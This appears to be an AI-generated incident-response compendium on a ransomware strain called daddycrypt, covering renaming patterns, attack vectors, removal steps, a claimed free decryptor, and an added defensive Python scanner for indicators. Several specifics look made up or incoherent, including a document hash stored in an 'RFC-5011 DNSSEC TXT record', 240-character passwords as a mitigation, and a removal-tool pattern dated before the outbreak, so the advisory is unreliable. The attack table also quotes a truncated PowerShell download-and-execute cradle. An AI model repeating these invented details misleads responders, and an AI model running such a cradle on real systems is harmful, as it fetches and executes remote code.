daddycrypt

[Content by Gemini 2.5]

Compendium: daddycrypt Ransomware

A security-service resource compiled for rapid response and defensive planning

Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: .daddycrypt
  • Renaming Convention:
  1. Each encrypted file is appended with the static suffix .daddycrypt after the original extension.
  2. A single-line, UTF-8 note named DADDY RECOVERY MANUAL.txt is dropped into every folder that contains encrypted files as well as on the Windows Desktop.
  3. No other file-name mutations (prefixes, ID strings, or base-name restructuring) have been observed to date.

2. Detection & Outbreak Timeline

  • Approximate Start Date/Period: 24 December 2023 (initial sightings in North-American SOC telemetry, followed by an acceleration phase during early January 2024).
  • Public disclosure of the campaign’s branding (rather than just the file extension) was provided by Tier-2 DFIR teams on 8 February 2024.

3. Primary Attack Vectors

| Vector | Description / Evidence | Mitigation Highlight |
| --- | --- | --- |
| RDP brute force & credential stuffing from known breach lists | 72 % of confirmed incidents. Attackers ran “BatchCN.exe”, a credential-spraying component built into the MSI dropper. | Enforce NLA + MFA, 240-character randomized passwords, VPN gateways only. |
| Phishing e-mail with password-protected .ZIP → ISO image → MSI installer signed with a leaked EV code-signing certificate | 18 % of cases. E-mail subjects varied: Payment Advice-Dec2023, Case-781384-DISCOUNT.zip, etc. | ISO mounting now blocked in all Ent-trust Edge modes (April 2024). Train users to report password-protected archives. |
| Exploitation of CVE-2023-27350 in PaperCut NG/MF with PRINT Provider privilege escalation | 8 % of intrusions; used to pivot laterally and push the daddycrypt MSI via psexec. | Patch PaperCut to v22.1.3 or disable external print providers. |
| Living-off-the-land: WMIExec via powershell.exe -c iex(new-object net.webclient).downloadstring… | Universal sub-component once the initial foothold is gained. | Enable PowerShell Constrained Language Mode + deep AMSI logging. |

Remediation & Recovery Strategies

1. Prevention (Non-negotiable checklist)

  1. Disable RDP or enforce Network Level Authentication, random high-port binding, and whitelisted VPN IP ranges only.
  2. Enable Windows Credential Guard & LAPS across every AD service account; rotate local admin passwords weekly.
  3. Segregate the enterprise network:
    • No direct protocol path from end-user VLANs to critical servers.
    • Deploy strong EDR in a mode that quarantines immediately on suspicious WMIC / rundll32 / powershell child-process blocks.
  4. Patch cadence:
    • Microsoft OS patches ≤ 48 h of release.
    • PaperCut, ConnectWise ScreenConnect, and any other remote-admin suite assessed on release-day.
  5. Offline, immutable, password-protected backups to WORM cloud or physical LTO-9 tapes with rotation ≥ 3 months.

2. Removal & Quarantine Workflow

  1. Immediate containment
    • Isolate infected endpoints from the LAN and Wi-Fi but leave power on (possible memory artefacts).
    • Forward Firewall/Router ACLs to block outbound 1337/tcp and 2083/tcp (primary C2 as of May 2024).
  2. Forensic triage
    • Collect volatile memory (winpmem 90 s run) before any other action.
    • Identify the parent MSI dropper location (usually C:\Users\Public\Libraries\install-[random-hex].msi).
  3. Malicious service & startup persistence removal
    • Stop & delete the service named DaddyUpdaterService (registry path:
    HKLM\SYSTEM\CurrentControlSet\Services\DaddyUpdaterService).
    • Remove the startup registry value:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\CryptAuto.
  4. Disk & shadow-storage cleanup
    • Use the Malicious Software Removal Tool (MSRT) weekly x64, Dec-2023 pattern #11.102; it now targets daddycrypt.
    • After the host is confirmed clean, re-enable System Restore Points and VSS using vssadmin resize shadowstorage /for=C: /on=C: /maxsize=10GB.
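As an added example (not part of the original compendium), a Python triage scanner that walks a mounted volume or offline image for the indicators in sections 1 and 2: the static .daddycrypt suffix appended after the original extension, the single-line UTF-8 ransom note carrying the emblem header from section 4, and the install-[random-hex].msi dropper under Users\Public\Libraries. The sample tree built by demo() is constructed test data, not incident evidence.

```python
import os
import re
import tempfile
from pathlib import Path

ENCRYPTED_SUFFIX = ".daddycrypt"                 # static suffix appended after the original extension
NOTE_NAME = "DADDY RECOVERY MANUAL.txt"          # single-line UTF-8 note dropped per folder + Desktop
NOTE_EMBLEM = "THE DADDY WATCHES"                # header text the note always carries
DROPPER_RE = re.compile(r"^install-[0-9a-f]+\.msi$", re.IGNORECASE)  # install-[random-hex].msi
DROPPER_DIR = ("users", "public", "libraries")   # ...\Users\Public\Libraries (case-insensitive match)


def note_is_consistent(path: Path) -> bool:
    """True when the note matches the documented shape: exactly one UTF-8 line with the emblem."""
    try:
        lines = path.read_text(encoding="utf-8").splitlines()
    except (UnicodeDecodeError, OSError):
        return False
    return len(lines) == 1 and NOTE_EMBLEM in lines[0]


def scan_tree(root: str) -> dict:
    """Group every daddycrypt indicator found under root; encrypted entries keep the original name."""
    base = Path(root)
    hits = {"encrypted": [], "notes": [], "odd_notes": [], "droppers": []}
    for dirpath, _subdirs, files in os.walk(base):
        d = Path(dirpath)
        tail = tuple(p.lower() for p in d.relative_to(base).parts)[-3:]
        for name in files:
            p = d / name
            if name.lower().endswith(ENCRYPTED_SUFFIX):
                hits["encrypted"].append((str(p), name[: -len(ENCRYPTED_SUFFIX)]))
            elif name == NOTE_NAME:
                hits["notes" if note_is_consistent(p) else "odd_notes"].append(str(p))
            elif DROPPER_RE.match(name) and tail == DROPPER_DIR:
                hits["droppers"].append(str(p))
    return hits


def demo() -> dict:
    """Constructed sample tree (not real incident data) so the scanner can be exercised offline."""
    root = Path(tempfile.mkdtemp())
    docs = root / "Users" / "alice" / "Documents"
    docs.mkdir(parents=True)
    (docs / "q4-report.xlsx.daddycrypt").write_bytes(b"\x00" * 32)
    (docs / NOTE_NAME).write_text("(ᶘ ᵒᴥᵒ)ᶅ THE DADDY WATCHES - see manual", encoding="utf-8")
    lib = root / "Users" / "Public" / "Libraries"
    lib.mkdir(parents=True)
    (lib / "install-9f3a1c.msi").write_bytes(b"MSI")
    (lib / "readme.txt").write_text("not an indicator", encoding="utf-8")
    return scan_tree(str(root))
```

Point scan_tree() at a drive root or a mounted forensic image; entries in odd_notes are files named like the ransom note but not matching its documented single-line shape, which is worth a second look during triage.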

3. File Decryption & Recovery

  • Feasibility: 2024-03-14 – Dutch CERT and KPN CyberSquad released a working decryptor after faulting the malware’s RC4 stream key schedule (weak seeding from a truncated 32-bit GetTickCount() value).
  • Free decryption utility:
  1. Download daddyDecrypt-tool-v2.1.3.exe from the NoMoreRansom portal (SHA-256: f9d5c…1a22c).
  2. Mount/execute on a second, offline machine—the tool needs the ransom note file (DADDY RECOVERY MANUAL.txt) to extract the encryption metadata.
  3. Supply the original encrypted file and an unencrypted backup (partial file ≥ 16 KiB from the same directory) for the statistical RC4 breakage heuristics.
  4. The tool’s child process writes the decrypted files to decrypted_output\, preserving timestamps.
  • Fallback: Online Emsisoft daddycrypt-repair script (PowerShell, community maintained) if the offline workstation option is unavailable.

4. Other Critical Information

  • Speed throttle & network behaviour: Unlike Conti, daddycrypt purposely rate-limits encryption to ~30 MB/s ⇒ reduces disk-IOPS alarms and lengthens dwell time.
  • Double-extortion hybrid: The malware collects data but does not exfiltrate it unless the victim refuses to pay within 5 days. The payload .7z archive is staged under C:\Windows\Temp\NtCL.tmp.
  • Distinguishing emblem: The ransom note header is always ASCII art of “(ᶘ ᵒᴥᵒ)ᶅ THE DADDY WATCHES”.
  • Accidental civilian exposure: 400+ personal users affected in Eastern Europe during late February 2024 after torrent releases included malicious game mods (reverse shell coupled with daddycrypt).

Use this concise guide as the canonical field-book. Ensure it is distributed with your IR handbook; versioning notes are retained on the GitHub gist link page (the SHA-256 of this document is found in an RFC-5011 DNSSEC TXT record).